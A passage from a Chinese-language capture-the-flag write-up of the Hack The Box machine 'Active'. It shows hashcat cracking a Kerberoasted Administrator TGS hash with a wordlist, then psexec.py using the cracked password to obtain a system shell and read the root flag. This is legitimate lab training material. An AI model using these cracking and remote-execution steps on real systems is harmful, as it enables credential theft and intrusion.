d8197972023a032c61771deff8022f9d9d9cae69a8be38bf86c5e51afee678f76fae7957f35f21e2d99b1cd37599c9d4dcaadbb39da55f5dbcd11b17b965678008938d2e6b8d9a197859cf86063df855c5524a85cdf13e1095dbea130e1fb664a99ff50ff262ec9c693f1b1ba8990cf7f8961901588bb483c1f0aeb4262dd736fdd04e77862aa53ed4e66d8ff3cb7d962f39cddf102849a8b1826b4b56bd9fba5d6a565d29db78a4a178fadba99a24e12559976b4be8e0bee17698448f1c134366ef06af452679da03ffb74858e9d5e0ee9ffdd80142becd7c01496bd119799b9cdf84f855f22408716dd5d2c9942d237273e24b324f1c45c62db7ddf6706233abfb6d32b32c81bc786a16caa67226317cb32772c80c765d5fd8338cc80f74aed3c878c6ff2e136d65a6d6aed9130e8

暴力破解TGS Hash

hashcat與字典檔暴力破解hash。

bash
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ hashcat --example-hashes | grep krb5tgs -B 11
Hash mode #13100
  Name................: Kerberos 5, etype 23, TGS-REP
  Category............: Network Protocol
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694a...24d9a [Truncated, use --mach for full length]
...                                                                                          
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ hashcat -m 13100 output.txt /usr/share/wordlists/rockyou.txt.gz 
hashcat (v6.2.6) starting
...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$23c43ae...ed9130e8:Ticketmaster1968
...

不知道為什麼第一次Nmap掃描有出現winrm,但沒有關係,可以如法炮製稍早取得user flag的方式,透過SMB找到root.txt,或是用psexec.py取得CMD。

bash
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ psexec.py active.htb/Administrator:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.129.122.239.....
[*] Found writable share ADMIN$
[*] Uploading file ouTWePBG.exe
[*] Opening SVCManager on 10.129.122.239.....
[*] Creating service gQQp on 10.129.122.239.....
[*] Starting service gQQp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> cd \

C:\> cd users/administrator/desktop

C:\Users\Administrator\Desktop> type root.txt
8b074aa02cd800724b6bd39e595974a7

Last update: 2024-12-23 Created: 2023-05-24